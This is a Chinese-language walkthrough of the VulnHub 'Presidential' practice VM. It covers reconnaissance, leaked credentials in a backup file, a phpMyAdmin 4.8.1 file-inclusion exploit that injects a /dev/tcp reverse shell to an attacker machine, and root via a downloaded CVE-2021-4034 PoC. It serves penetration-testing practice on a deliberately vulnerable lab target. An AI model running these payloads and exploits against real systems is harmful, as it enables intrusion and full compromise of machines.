今天實踐的是vulnhub的Presidential鏡像,

下載地址,https://download.vulnhub.com/presidential/Presidential.ova,

用workstation導入,做地址掃描,sudo netdiscover -r 192.168.58.0/24,

187就是靶機,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.187,

有web服務,瀏覽器訪問http://192.168.58.187,

猜測192.168.58.187對應的域名是votenow.local,

做php路徑掃描,dirb http://192.168.58.187 -X .php,.php.bak,

瀏覽器訪問http://192.168.58.187/config.php.bak,查看頁面源碼,

獲取到用戶名密碼votebox/casoj3FFASPsbyoRP,

本地hosts文件添加192.168.58.187      votenow.local,

做子域名的掃描,

gobuster vhost --append-domain -u votenow.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"

本地hosts文件再添加192.168.58.187      datasafe.votenow.local,

瀏覽器訪問http://datasafe.votenow.local,

確認到應用信息phpmyadmin 4.8.1,搜索可利用的漏洞,

聚焦到一個文件包含漏洞,獲取到利用方法,

提交select '& /dev/tcp/192.168.58.188/4444 0>&1");exit;?>',

查詢cookie填到url中,kali攻擊機上開個反彈shell監聽,nc -lvp 4444,

瀏覽器訪問http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_qk9ji8g6c1iupcko6df5nn5g8a8779pt,

反彈shell這就過來了,不是root,需要提權,

上傳linpeas.sh文件,

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230319/linpeas.sh,

獲取到可利用的漏洞,CVE-2021-4034,

從網上找到可用的poc文件,

wget https://github.com/EstamelGG/CVE-2021-4034-NoGCC/releases/download/v4.0/cve-2021-4034-poc-64,

執行poc文件,id確認是root,